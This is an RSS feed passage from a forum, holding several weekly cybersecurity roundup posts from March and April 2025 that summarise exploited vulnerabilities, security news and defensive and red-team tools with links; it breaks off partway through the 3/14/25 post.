<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[DoTheNeedful Forums - Cybersecurity]]></title>
		<link>https://dotheneedful.online/forums/</link>
		<description><![CDATA[DoTheNeedful Forums - https://dotheneedful.online/forums]]></description>
		<pubDate>Sun, 05 Apr 2026 17:29:54 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Gibby's Cybersecurity Roundup 4/4/2025]]></title>
			<link>https://dotheneedful.online/forums/showthread.php?tid=42</link>
			<pubDate>Fri, 04 Apr 2025 18:26:55 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dotheneedful.online/forums/member.php?action=profile&uid=3">gibby</a>]]></dc:creator>
			<guid isPermaLink="false">https://dotheneedful.online/forums/showthread.php?tid=42</guid>
			<description><![CDATA[<div style="text-align: right;" class="mycode_align"><img src="https://dotheneedful.online/forums/images/tlp/tlpclear.png" style="width:auto;height:auto;max-width:5%;" /></div>
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/O0zT3Ar.png" loading="lazy"  alt="[Image: O0zT3Ar.png]" class="mycode_img" /></div>
<br />
Hi everyone and welcome to the third edition of Gibby’s cybersecurity roundup. Each week, I’ll try to compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.<br />
<br />
I'm using some industry terminology here that might not be clear to everyone. If you have questions, let me know, but in the meantime here's my attempt to make it digestible for everyone:<ul class="mycode_list"><li>TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about <a href="https://www.cisa.gov/news-events/news/traffic-light-protocol-tlp-definitions-and-usage" target="_blank" rel="noopener" class="mycode_url">TLP, and its classification levels, here</a><br />
</li>
<li>Blue Team - The Security Team focused on Defense and Detection<br />
</li>
<li>Red Team - The Security Team focused on Attacks and Evasion<br />
</li>
</ul>
<br />
If you want to see something added here let me know! <br />
<br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/plvm6YX.png" loading="lazy"  width="332" height="50" alt="[Image: plvm6YX.png]" class="mycode_img" /></div>
<br />
Well, look at that! The usual suspects in the software world apparently took a collective "no new critical flaws this week" vacation. So, instead of our regularly scheduled panic, let's dive into the KEV list – the Hall of Shame for bugs <span style="font-style: italic;" class="mycode_i">already</span> being used to cause trouble. And wouldn't you know it, this week's inductees are all bringing the high-stakes drama! <br />
<br />
<span style="color: #c10300;" class="mycode_color"><span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">High Risk:</span></span></span><span style="font-size: medium;" class="mycode_size"> </span><span style="font-size: large;" class="mycode_size">Google Chrome Zero-day Vulnerability Exploited in the Wild (CVE-2025-2783)</span><br />
<a href="https://threatprotect.qualys.com/2025/03/26/google-chrome-zero-day-vulnerability-exploited-in-the-wild-cve-2025-2783/" target="_blank" rel="noopener" class="mycode_url">https://threatprotect.qualys.com/2025/03...2025-2783/</a><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color">High Risk:</span></span> Cisco Smart Licensing Utility Vulnerabilities</span><br />
<a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw" target="_blank" rel="noopener" class="mycode_url">https://sec.cloudapps.cisco.com/security...u-7gHMzWmw</a><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color">High Risk:</span></span> Apache Tomcat CVE-2025-24813</span><br />
<a href="https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/" target="_blank" rel="noopener" class="mycode_url">https://www.rapid7.com/blog/post/2025/03...d-to-know/</a><br />
<br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/TVVm7lW.png" loading="lazy"  width="228" height="50" alt="[Image: TVVm7lW.png]" class="mycode_img" /></div>
<br />
Google's Kyle Chrzanowski says big companies need robot overlords for their digital who's-who, automating everything from birth (account creation) to death (access revocation) of employee identities. Apparently, tackling the messy middle of governance before a massive single sign-on migration is the smart way to avoid a chaotic digital identity crisis. <br />
<a href="https://www.googlecloudcommunity.com/gc/Community-Blog/The-Director-s-Guide-IAM-Security-at-Scale/ba-p/882952" target="_blank" rel="noopener" class="mycode_url">https://www.googlecloudcommunity.com/gc/...a-p/882952</a><br />
<br />
Sophos detailed this week that Evilginx is still remarkably effective at grabbing credentials and MFA codes.<br />
<a href="https://news.sophos.com/en-us/2025/03/28/stealing-user-credentials-with-evilginx/" target="_blank" rel="noopener" class="mycode_url">https://news.sophos.com/en-us/2025/03/28...-evilginx/</a><br />
<br />
Check Point reassures its customers that the bad guys are "totally lying" about what they were able to get into and steal, and to trust them instead:<br />
<a href="https://support.checkpoint.com/results/sk/sk183307" target="_blank" rel="noopener" class="mycode_url">https://support.checkpoint.com/results/sk/sk183307</a><br />
<br />
Chinese hackers are *still* exploiting a buffer overflow flaw in Ivanti's Connect Secure, Policy Secure, and ZTA gateway products. CVE-2025-22457, released in February, was originally marked as "low severity," and now that the bad guys are kicking in the door reliably, they have reconsidered and classified the flaw as "critical." Idiots.<br />
<a href="https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457" target="_blank" rel="noopener" class="mycode_url">https://forums.ivanti.com/s/article/Apri...2025-22457</a><br />
<br />
Don't use DMARC? Don't expect Outlook, Live, and Hotmail accounts to get your messages then. After May 5, DMARC is mandatory to get messages to inboxes. <br />
<a href="https://techcommunity.microsoft.com/blog/microsoftdefenderforoffice365blog/strengthening-email-ecosystem-outlook%E2%80%99s-new-requirements-for-high%E2%80%90volume-senders/4399730" target="_blank" rel="noopener" class="mycode_url">https://techcommunity.microsoft.com/blog...rs/4399730</a><br />
<br />
After *WEEKS* of denying it, Oracle finally acknowledged a breach occurred, surprising absolutely no one.<br />
<a href="https://www.bloomberg.com/news/articles/2025-04-02/oracle-tells-clients-of-second-recent-hack-log-in-data-stolen" target="_blank" rel="noopener" class="mycode_url">https://www.bloomberg.com/news/articles/...ata-stolen</a><br />
<br />
 <br />
<hr class="mycode_hr" />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/EEG6FZS.png" loading="lazy"  width="197" height="40" alt="[Image: EEG6FZS.png]" class="mycode_img" /></div>
<br />
Stratus Red Team is a tool by Datadog that can “detonate” offensive attack techniques against a live cloud environment so you can validate that your detections work as expected. I’m highlighting here that the docs now provide coverage matrices of MITRE ATT&amp;CK tactics and techniques currently covered for different cloud platforms: AWS, Azure, GCP, Kubernetes, Entra ID, and EKS.<br />
<a href="https://stratus-red-team.cloud/attack-techniques/mitre-attack-coverage-matrices" target="_blank" rel="noopener" class="mycode_url">https://stratus-red-team.cloud/attack-te...e-matrices</a><br />
<br />
Wiz has launched a new site for security teams to track critical cloud vulnerabilities, offering handy filters like technology and exploit status. Now you can finally stop manually sifting through endless CVEs and let Wiz be your cloud's most wanted poster.<br />
<a href="https://www.wiz.io/vulnerability-database" target="_blank" rel="noopener" class="mycode_url">https://www.wiz.io/vulnerability-database</a><br />
<br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/JkUpDIt.png" loading="lazy"  width="197" height="40" alt="[Image: JkUpDIt.png]" class="mycode_img" /></div>
<br />
By Thalium comes a Rust-powered digital bloodhound for Linux, sniffing out sneaky kernel-level rootkits with its fancy integrity checks. It's like giving your kernel a superhero sidekick, but instead of a cape, it wields the Linux Rust API.<br />
<a href="https://github.com/thalium/rkchk" target="_blank" rel="noopener" class="mycode_url">https://github.com/thalium/rkchk</a><br />
<br />
This tool sniffs out Google Workspace Domain-Wide Delegation slip-ups in Google Cloud, essentially showing you where you left the keys to the digital kingdom under the doormat. Consider it your auditor for those "oops, did I leave that open?" moments in your GCP setup.<br />
<a href="https://github.com/n0tspam/delepwn" target="_blank" rel="noopener" class="mycode_url">https://github.com/n0tspam/delepwn</a><br />
<br />
ServiceNow, the cloud platform that promised IT zen, turns out to have some hidden ninja stars, according to MDSec's Tim Carrington. Apparently, you can weaponize its own features like custom actions and discovery scripts to run rogue code and generally cause digital mayhem.<br />
<a href="https://www.mdsec.co.uk/2025/03/red-teaming-with-servicenow" target="_blank" rel="noopener" class="mycode_url">https://www.mdsec.co.uk/2025/03/red-team...servicenow</a><br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size"><img src="https://i.imgur.com/p227pSB.png" loading="lazy"  width="250" height="40" alt="[Image: p227pSB.png]" class="mycode_img" /></span></span></div>
<br />
Here is a spot where I’ll just generally soapbox when I want to. <br />
 <br />
I sure hope you have a wonderful rest of your week.<br />
<br />
<br />
<br />
That's it for this week. Thanks for reading, y'all. See you next week.<br />
<br />
<div style="text-align: right;" class="mycode_align"><img src="https://dotheneedful.online/forums/images/tlp/tlpclear.png" style="width:auto;height:auto;max-width:5%;" /> </div>]]></description>
		</item>
		<item>
			<title><![CDATA[Gibby's Cybersecurity Roundup 3/21/25]]></title>
			<link>https://dotheneedful.online/forums/showthread.php?tid=33</link>
			<pubDate>Thu, 20 Mar 2025 19:51:54 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dotheneedful.online/forums/member.php?action=profile&uid=3">gibby</a>]]></dc:creator>
			<guid isPermaLink="false">https://dotheneedful.online/forums/showthread.php?tid=33</guid>
			<description><![CDATA[<div style="text-align: right;" class="mycode_align"><img src="https://dotheneedful.online/forums/images/tlp/tlpclear.png" style="width:auto;height:auto;max-width:5%;" /></div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/O0zT3Ar.png" loading="lazy"  alt="[Image: O0zT3Ar.png]" class="mycode_img" /></div>
<br />
Hi everyone and welcome to the second edition of Gibby’s cybersecurity roundup. Each week, I’ll try to compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.<br />
<br />
I'm using some industry terminology here that might not be clear to everyone. If you have questions, let me know, but in the meantime here's my attempt to make it digestible for everyone:<ul class="mycode_list"><li>TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about <a href="https://www.cisa.gov/news-events/news/traffic-light-protocol-tlp-definitions-and-usage" target="_blank" rel="noopener" class="mycode_url">TLP, and its classification levels, here</a><br />
</li>
<li>Blue Team - The Security Team focused on Defense and Detection<br />
</li>
<li>Red Team - The Security Team focused on Attacks and Evasion<br />
</li>
</ul>
<br />
If you want to see something added here let me know! <br />
<br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/plvm6YX.png" loading="lazy"  width="332" height="50" alt="[Image: plvm6YX.png]" class="mycode_img" /></div>
<br />
First, let's get started with this week's new vulnerabilities. While this list is not exhaustive (there were a touch more than 600 new CVEs assigned this week), it does cover some of the more popular and higher-risk ones.<br />
<br />
<span style="color: #c10300;" class="mycode_color"><span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">High Risk:</span></span></span><span style="font-size: large;" class="mycode_size"> Apache Tomcat vulnerability exploited 30 hours after security bulletin released, Confluence admins collectively groan in unison.</span><br />
Can't make this up: just 30 hours after the release of the vuln, hackers had an extremely effective and really good exploit for the Tomcat service. So, you might want to <a href="https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html" target="_blank" rel="noopener" class="mycode_url">patch this if you haven't already!</a><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color">High Risk:</span></span> A Vulnerability in Veeam allows attackers to execute code remotely; because why not?</span><br />
<span style="font-size: small;" class="mycode_size">Veeam has had some doozies lately, but this one is pretty up there. Domain-joined backup servers can pew pew code out, making it easy for attackers to distribute malware. There is a patch, but the race is on before this is added to the known exploited database, so get on it. <a href="https://www.veeam.com/kb4724" target="_blank" rel="noopener" class="mycode_url">https://www.veeam.com/kb4724</a></span><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color">High Risk:</span></span> tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs</span><br />
tj-actions, a well-known and widely used repo for automating CI/CD silliness, had its source changed and hackers were able to get info they shouldn't have. <a href="https://www.cve.org/CVERecord?id=CVE-2025-30066" target="_blank" rel="noopener" class="mycode_url">https://www.cve.org/CVERecord?id=CVE-2025-30066</a><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c19e00;" class="mycode_color">Medium Risk:</span></span> Another popular WordPress plugin used on 200,000+ sites has a major security flaw; no one is surprised.</span><br />
WP Ghost, a popular WordPress security plugin, has a critical remote code execution vulnerability, allowing server takeover by unauthenticated attackers. <a href="https://patchstack.com/articles/critical-lfi-to-rce-vulnerability-in-wp-ghost-plugin-affecting-200k-sites/" target="_blank" rel="noopener" class="mycode_url">https://patchstack.com/articles/critical...00k-sites/</a><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c19e00;" class="mycode_color">Medium Risk:</span></span> Some Cisco routers have a software flaw that allows attackers to DoS the BGP service.</span><br />
Looks like this flaw is contained within the BGP service on Cisco XR routers, but it is a pretty bad thing. Check out the security advisory here: <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-bgp-dos-O7stePhX" target="_blank" rel="noopener" class="mycode_url">https://sec.cloudapps.cisco.com/security...s-O7stePhX</a><br />
<br />
<br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/TVVm7lW.png" loading="lazy"  width="228" height="50" alt="[Image: TVVm7lW.png]" class="mycode_img" /></div>
<br />
Here's a free web scanner that returns some really awesome information:<br />
<a href="https://cyscan.io/" target="_blank" rel="noopener" class="mycode_url">https://cyscan.io/</a><br />
<br />
Into Threat Modeling? TRAIL, a threat modeling process by Trail of Bits, blends RRA and NIST approaches to analyze system architecture for design flaws. It models system components, maps threat actor paths, and documents scenarios, providing both immediate mitigations and strategic recommendations.<br />
<a href="https://blog.trailofbits.com/2025/02/28/threat-modeling-the-trail-of-bits-way" target="_blank" rel="noopener" class="mycode_url">https://blog.trailofbits.com/2025/02/28/...f-bits-way</a><br />
<br />
State-sponsored hackers (and some red teams (shhhhh)) are leveraging a flaw that was discovered in 2017 and still not patched by Microsoft.<br />
<a href="https://www.zerodayinitiative.com/advisories/ZDI-25-148/2017" target="_blank" rel="noopener" class="mycode_url">https://www.zerodayinitiative.com/adviso...5-148/2017</a> <br />
<br />
Sperm bank breach deposits data into hands of cybercriminals (I didn't want to edit this hilarious article title because it's A+ on its own)<br />
<a href="https://www.malwarebytes.com/blog/news/2025/03/sperm-bank-breach-deposits-data-into-hands-of-cybercriminals" target="_blank" rel="noopener" class="mycode_url">https://www.malwarebytes.com/blog/news/2...rcriminals</a><br />
<br />
By Golly G Wizz... Google Buys Wiz (for a metric shittonne of money)<br />
<a href="https://www.reuters.com/technology/cybersecurity/google-agrees-buy-cybersecurity-startup-wiz-32-bln-ft-reports-2025-03-18/" target="_blank" rel="noopener" class="mycode_url">https://www.reuters.com/technology/cyber...025-03-18/</a><br />
<br />
New Kali version out! Now with less salt and more theme action!<br />
<a href="https://www.kali.org/blog/kali-linux-2025-1-release/" target="_blank" rel="noopener" class="mycode_url">https://www.kali.org/blog/kali-linux-2025-1-release/</a><br />
<br />
 <br />
<hr class="mycode_hr" />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/EEG6FZS.png" loading="lazy"  width="197" height="40" alt="[Image: EEG6FZS.png]" class="mycode_img" /></div>
<br />
Detection Studio is a browser tool that converts Sigma rules to SIEM languages (Splunk, Elasticsearch, Grafana) locally using pySigma. It features pipeline/filter support, persistent workspaces, and rule sharing. <br />
<a href="https://detection.studio/" target="_blank" rel="noopener" class="mycode_url">https://detection.studio/</a> <br />
<br />
Purple Lab simplifies detection rule testing by deploying a lab for log simulation, malware/ATT&amp;CK execution, and sandbox restoration. <br />
<a href="https://github.com/Krook9d/PurpleLab" target="_blank" rel="noopener" class="mycode_url">https://github.com/Krook9d/PurpleLab</a><br />
<br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/JkUpDIt.png" loading="lazy"  width="197" height="40" alt="[Image: JkUpDIt.png]" class="mycode_img" /></div>
<br />
shadow-rs is a Rust-based Windows kernel rootkit that showcases advanced kernel manipulation with Rust's safety and performance.<br />
<a href="https://github.com/joaoviictorti/shadow-rs" target="_blank" rel="noopener" class="mycode_url">https://github.com/joaoviictorti/shadow-rs</a><br />
<br />
Adversary Simulation Success by the folks over at TrustedSec outlines measuring AdSim success via control testing, defensive enlightenment, and professional courtesy, providing metrics for each. <br />
<a href="https://trustedsec.com/blog/measuring-the-success-of-your-adversary-simulations" target="_blank" rel="noopener" class="mycode_url">https://trustedsec.com/blog/measuring-th...imulations</a><br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size"><img src="https://i.imgur.com/p227pSB.png" loading="lazy"  width="250" height="40" alt="[Image: p227pSB.png]" class="mycode_img" /></span></span></div>
<br />
Here is a spot where I’ll just generally soapbox when I want to. <br />
 <br />
Keep an eye out on the clickfix campaigns I mentioned last week folks. That activity is really ramping up.<br />
<br />
<br />
<br />
That's it for this week. Thanks for reading, y'all. See you next week.<br />
<br />
<div style="text-align: right;" class="mycode_align"><img src="https://dotheneedful.online/forums/images/tlp/tlpclear.png" style="width:auto;height:auto;max-width:5%;" /> </div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: right;" class="mycode_align"><img src="https://dotheneedful.online/forums/images/tlp/tlpclear.png" style="width:auto;height:auto;max-width:5%;" /></div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/O0zT3Ar.png" loading="lazy"  alt="[Image: O0zT3Ar.png]" class="mycode_img" /></div>
<br />
Hi everyone and welcome to the second edition of Gibby’s cybersecurity roundup. Each week, I’ll try to compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.<br />
<br />
I'm using some industry terminology here that might not be clear to everyone. If you have questions let me know but in the meantime here's my attempt to make it digestible for everyone:<ul class="mycode_list"><li>TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about <a href="https://www.cisa.gov/news-events/news/traffic-light-protocol-tlp-definitions-and-usage" target="_blank" rel="noopener" class="mycode_url">TLP, and its classification levels, here</a><br />
</li>
<li>Blue Team - The Security Team focused on Defense and Detection<br />
</li>
<li>Red team - The Security Team focused on Attacks and Evasion <br />
</li>
</ul>
<br />
If you want to see something added here let me know! <br />
<br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/plvm6YX.png" loading="lazy"  width="332" height="50" alt="[Image: plvm6YX.png]" class="mycode_img" /></div>
<br />
First, let's get started with this week's new vulnerabilities. While this list is not exhaustive-- there were a touch more than 600 new CVEs assigned this week-- it does cover some of the more popular and higher-risk ones. <br />
<br />
<span style="color: #c10300;" class="mycode_color"><span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">High Risk:</span></span></span><span style="font-size: large;" class="mycode_size"> Apache Tomcat vulnerability exploited 30 hours after security bulletin released; Confluence admins collectively groan in unison.</span><br />
Can't make this up-- just 30 hours after the release of the vuln, hackers had an extremely effective and really good exploit for the Tomcat service. So, you might want to <a href="https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html" target="_blank" rel="noopener" class="mycode_url">patch this if you haven't already!</a><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color">High Risk:</span></span> A vulnerability in Veeam allows attackers to execute code remotely; because why not?</span><br />
<span style="font-size: small;" class="mycode_size">Veeam has had some doozies lately, but this one is pretty up there. Domain-joined backup servers can pew pew code out, making it easy for attackers to distribute malware. There is a patch, but the race is on before this is added to the known exploited database, so get on it. <a href="https://www.veeam.com/kb4724" target="_blank" rel="noopener" class="mycode_url">https://www.veeam.com/kb4724</a></span><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color">High Risk:</span></span> tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs</span><br />
tj-actions, a well-known and widely used repo for automating CI/CD silliness, had its source changed and hackers were able to get info they shouldn't have. <a href="https://www.cve.org/CVERecord?id=CVE-2025-30066" target="_blank" rel="noopener" class="mycode_url">https://www.cve.org/CVERecord?id=CVE-2025-30066</a><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c19e00;" class="mycode_color">Medium Risk:</span></span> Another popular WordPress plugin used on 200,000+ sites has a major security flaw; no one is surprised. </span><br />
WP Ghost, a popular WordPress security plugin, has a critical remote code execution vulnerability, allowing server takeover by unauthenticated attackers. <a href="https://patchstack.com/articles/critical-lfi-to-rce-vulnerability-in-wp-ghost-plugin-affecting-200k-sites/" target="_blank" rel="noopener" class="mycode_url">https://patchstack.com/articles/critical...00k-sites/</a><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c19e00;" class="mycode_color">Medium Risk:</span></span> Some Cisco routers have a software flaw that allows an attacker to DoS the BGP service. </span><br />
Looks like this flaw is contained within the BGP service on Cisco IOS XR routers, but it is a pretty bad thing. Check out the security advisory here: <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-bgp-dos-O7stePhX" target="_blank" rel="noopener" class="mycode_url">https://sec.cloudapps.cisco.com/security...s-O7stePhX</a><br />
<br />
<br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/TVVm7lW.png" loading="lazy"  width="228" height="50" alt="[Image: TVVm7lW.png]" class="mycode_img" /></div>
<br />
Here's a free web scanner that returns some really awesome information:<br />
<a href="https://cyscan.io/" target="_blank" rel="noopener" class="mycode_url">https://cyscan.io/</a><br />
<br />
Into Threat Modeling? TRAIL, a threat modeling process by Trail of Bits, blends RRA and NIST approaches to analyze system architecture for design flaws. It models system components, maps threat actor paths, and documents scenarios, providing both immediate mitigations and strategic recommendations.<br />
<a href="https://blog.trailofbits.com/2025/02/28/threat-modeling-the-trail-of-bits-way" target="_blank" rel="noopener" class="mycode_url">https://blog.trailofbits.com/2025/02/28/...f-bits-way</a><br />
<br />
State Sponsored Hackers (and some red teams (shhhhh)) are leveraging a flaw that was discovered in 2017 and still not patched by Microsoft. <br />
<a href="https://www.zerodayinitiative.com/advisories/ZDI-25-148/2017" target="_blank" rel="noopener" class="mycode_url">https://www.zerodayinitiative.com/adviso...5-148/2017</a> <br />
<br />
Sperm bank breach deposits data into hands of cybercriminals (I didn't want to edit this hilarious article title because it's A+ on its own)<br />
<a href="https://www.malwarebytes.com/blog/news/2025/03/sperm-bank-breach-deposits-data-into-hands-of-cybercriminals" target="_blank" rel="noopener" class="mycode_url">https://www.malwarebytes.com/blog/news/2...rcriminals</a><br />
<br />
By Golly G Wizz... Google Buys Wiz (for a metric shittonne of money)<br />
<a href="https://www.reuters.com/technology/cybersecurity/google-agrees-buy-cybersecurity-startup-wiz-32-bln-ft-reports-2025-03-18/" target="_blank" rel="noopener" class="mycode_url">https://www.reuters.com/technology/cyber...025-03-18/</a><br />
<br />
New kali version out! Now with less salt and more theme action! <br />
<a href="https://www.kali.org/blog/kali-linux-2025-1-release/" target="_blank" rel="noopener" class="mycode_url">https://www.kali.org/blog/kali-linux-2025-1-release/</a><br />
<br />
 <br />
<hr class="mycode_hr" />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/EEG6FZS.png" loading="lazy"  width="197" height="40" alt="[Image: EEG6FZS.png]" class="mycode_img" /></div>
<br />
Detection Studio is a browser tool that converts Sigma rules to SIEM languages (Splunk, Elasticsearch, Grafana) locally using pySigma. It features pipeline/filter support, persistent workspaces, and rule sharing. <br />
<a href="https://detection.studio/" target="_blank" rel="noopener" class="mycode_url">https://detection.studio/</a> <br />
<br />
Purple Lab simplifies detection rule testing by deploying a lab for log simulation, malware/ATT&amp;CK execution, and sandbox restoration. <br />
<a href="https://github.com/Krook9d/PurpleLab" target="_blank" rel="noopener" class="mycode_url">https://github.com/Krook9d/PurpleLab</a><br />
<br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/JkUpDIt.png" loading="lazy"  width="197" height="40" alt="[Image: JkUpDIt.png]" class="mycode_img" /></div>
<br />
shadow-rs is a Rust-based Windows kernel rootkit that showcases advanced kernel manipulation with Rust's safety and performance. <br />
<a href="https://github.com/joaoviictorti/shadow-rs" target="_blank" rel="noopener" class="mycode_url">https://github.com/joaoviictorti/shadow-rs</a><br />
<br />
Adversary Simulation Success by the folks over at TrustedSec outlines measuring AdSim success via control testing, defensive enlightenment, and professional courtesy, providing metrics for each. <br />
<a href="https://trustedsec.com/blog/measuring-the-success-of-your-adversary-simulations" target="_blank" rel="noopener" class="mycode_url">https://trustedsec.com/blog/measuring-th...imulations</a><br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size"><img src="https://i.imgur.com/p227pSB.png" loading="lazy"  width="250" height="40" alt="[Image: p227pSB.png]" class="mycode_img" /></span></span></div>
<br />
Here is a spot where I’ll just generally soapbox when I want to. <br />
 <br />
Keep an eye out on the clickfix campaigns I mentioned last week folks. That activity is really ramping up.<br />
<br />
<br />
<br />
That's it for this week. Thanks for reading, y'all. See you next week.<br />
<br />
<div style="text-align: right;" class="mycode_align"><img src="https://dotheneedful.online/forums/images/tlp/tlpclear.png" style="width:auto;height:auto;max-width:5%;" /> </div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Gibby’s Cybersecurity Roundup – 3/14/25]]></title>
			<link>https://dotheneedful.online/forums/showthread.php?tid=25</link>
			<pubDate>Thu, 13 Mar 2025 16:24:03 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dotheneedful.online/forums/member.php?action=profile&uid=3">gibby</a>]]></dc:creator>
			<guid isPermaLink="false">https://dotheneedful.online/forums/showthread.php?tid=25</guid>
			<description><![CDATA[<div style="text-align: right;" class="mycode_align"><img src="https://i.imgur.com/nDIfEKX.png" loading="lazy"  alt="[Image: nDIfEKX.png]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/O0zT3Ar.png" loading="lazy"  alt="[Image: O0zT3Ar.png]" class="mycode_img" /></div>
<br />
Hi everyone and welcome to the first edition of Gibby’s cybersecurity roundup. Each week, I’ll compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.<br />
<br />
I'm using some industry terminology here that might not be clear to everyone. If you have questions let me know but in the meantime here's my attempt to make it digestible for everyone:<ul class="mycode_list"><li>TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about <a href="https://www.cisa.gov/news-events/news/traffic-light-protocol-tlp-definitions-and-usage" target="_blank" rel="noopener" class="mycode_url">TLP, and its classification levels, here</a><br />
</li>
<li>Blue Team - The Security Team focused on Defense and Detection<br />
</li>
<li>Red team - The Security Team focused on Attacks and Evasion <br />
</li>
</ul>
<br />
If you want to see something added here let me know! <br />
<br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/plvm6YX.png" loading="lazy"  alt="[Image: plvm6YX.png]" class="mycode_img" /></div>
<br />
First, let's get started with this week's new vulnerabilities. While this list is not exhaustive-- there were a touch more than 600 new CVEs assigned this week-- it does cover some of the more popular and higher-risk ones. <br />
<br />
<span style="color: #c10300;" class="mycode_color"><span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">High Risk:</span></span></span><span style="font-size: medium;" class="mycode_size"> Publicly facing VMware ESXi servers are getting smoked with a chain of vulnerabilities that allow hackers to execute code on the hypervisor. </span><br />
Find the Q&amp;A about this here: <a href="https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-advisories/vmsa-2025-0004" target="_blank" rel="noopener" class="mycode_url">https://github.com/vmware/vcf-security-a...-2025-0004</a><br />
And more information about the vulnerability here: <a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390" target="_blank" rel="noopener" class="mycode_url">https://support.broadcom.com/web/ecx/sup...es/0/25390</a><br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="color: #c10300;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">High Risk:</span> </span>Microsoft Patch Tuesday fixes seven 0-days and fifty-seven security flaws. </span><br />
